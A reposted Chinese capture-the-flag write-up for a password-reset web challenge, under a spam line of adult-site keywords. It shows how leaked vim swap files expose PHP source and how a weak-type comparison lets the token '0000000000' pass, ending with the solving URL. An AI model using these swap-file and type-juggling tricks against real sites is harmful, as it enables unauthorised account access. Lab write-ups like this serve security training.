日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CG CTF WEB 密码重置2

發布時間:2024/10/5 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CG CTF WEB 密码重置2 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

http://nctf.nuptzj.cn/web14/index.php

TIPS:

1.管理員郵箱觀察一下就可以找到 2.linux下一般使用vi編輯器,并且異常退出會留下備份文件 3.弱類型bypass <html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><meta name="renderer" content="webkit"><meta name="admin" content="admin@nuptzj.cn"><meta name="editor" content="Vim"><title>logic</title><style type="text/css">body,html{position: relative;height: 100%;width: 100%;padding: 0;margin: 0;background-color: #272822;color: #fff;}form{position: absolute;top: 50%;left: 50%;width: 400px;margin: -70px -200px;}form input{display: block;margin: 10px auto;width: 100%;border: none;height: 2rem;border-radius: 5px;}</style> </head> <body><form action="submit.php" method="GET"><h1>找回管理員密碼</h1>email:<input name="emailAddress" type="text"><br>token:<input name="token" type="text"><br><input type="submit" value="提交"></form></body></html>

?

題解:

原理:

vim的特性,自動備份:

一、vim備份文件

?????默認情況下使用Vim編程,在修改文件后系統會自動生成一個帶~的備份文件,某些情況下可以對其下載進行查看;

????eg:index.php普遍意義上的首頁,輸入域名不一定會顯示。 ??它的備份文件則為index.php~

二、vim臨時文件

????vim中的swp即swap文件,在編輯文件時產生,它是隱藏文件,如果原文件名是submit,則它的臨時文件

?.submit.swp。如果文件正常退出,則此文件自動刪除。
?

?獲取.submit.php.swp

........這一行是省略的代碼......../* 如果登錄郵箱地址不是管理員則 die() 數據庫結構-- -- 表的結構 `user` --CREATE TABLE IF NOT EXISTS `user` (`id` int(11) NOT NULL AUTO_INCREMENT,`username` varchar(255) NOT NULL,`email` varchar(255) NOT NULL,`token` int(255) NOT NULL DEFAULT '0',PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;-- -- 轉存表中的數據 `user` --INSERT INTO `user` (`id`, `username`, `email`, `token`) VALUES (1, '****不可見***', '***不可見***', 0); */........這一行是省略的代碼........if(!empty($token)&&!empty($emailAddress)){if(strlen($token)!=10) die('fail');if($token!='0') die('fail');$sql = "SELECT count(*) as num from `user` where token='$token' AND email='$emailAddress'";$r = mysql_query($sql) or die('db error');$r = mysql_fetch_assoc($r);$r = $r['num'];if($r>0){echo $flag;}else{echo "失敗了呀";} }

可知:token=0000000000

<meta name="admin" content="admin@nuptzj.cn">

所以

URL=http://nctf.nuptzj.cn/web14/submit.php?emailAddress=admin@nuptzj.cn&token=0000000000

總結

以上是生活随笔為你收集整理的CG CTF WEB 密码重置2的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。